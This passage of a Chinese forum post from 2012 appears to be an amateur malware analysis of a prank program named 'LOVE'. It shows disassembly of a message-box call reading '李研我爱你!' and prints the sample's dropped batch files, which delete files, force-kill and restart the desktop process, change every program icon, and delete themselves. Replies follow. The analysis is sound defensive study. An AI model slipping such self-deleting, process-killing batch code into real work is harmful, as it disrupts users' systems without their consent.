D3 |. 68 9FC44600 push LOVE.0046C49F ; LOVE
D8 |. 68 01030080 push 0x80000301
DD |. 6A 00 push 0x0
DF |. 68 00000000 push 0x0
E4 |. 68 04000080 push 0x80000004
E9 |. 6A 00 push 0x0
EB |. 68 A4C44600 push LOVE.0046C4A4 ; 李研我爱你!
F0 |. 68 03000000 push 0x3
F5 |. BB E03B4000 mov ebx,LOVE.00403BE0
FA |. E8 54000000 call LOVE.00403353 ;到此处,基本完事,这儿就是弹出消息框:“李研我爱你!”
FF |. 83C4 28 add esp,0x28
|. 8BE5 mov esp,ebp
|. 5D pop ebp
补充:
生成的del.bat文件和ddel.bat文件的内容:
del.bat:
del Aver.exe del.bat ---->删除Aver.exe和del.bat
del %
ddel.bat:
@echo off
taskkill /f /im expleror.exe ---->强制终止expleror.exe进程,也就是桌面进程。
start expleror.exe ---->重新启动。 这儿就是为了显示:所有应用程序图标变化。执行之后,所有应用程序的默认图标都是那个Aver.ico
del ddel.bat ---->删除自己。
exit
第一次分析,其中还有很多地方,很多细节没有分析到位,请各位大大多多指教。。。 |
发表于 2012-8-4 13:38
发表于 2012-8-4 13:43
|
发表于 2012-8-4 13:44
打开方式那个我实验过,可以右键选择打开方式。 然后解决办法的话 应该可以用杀毒工具杀吧。。。求指导~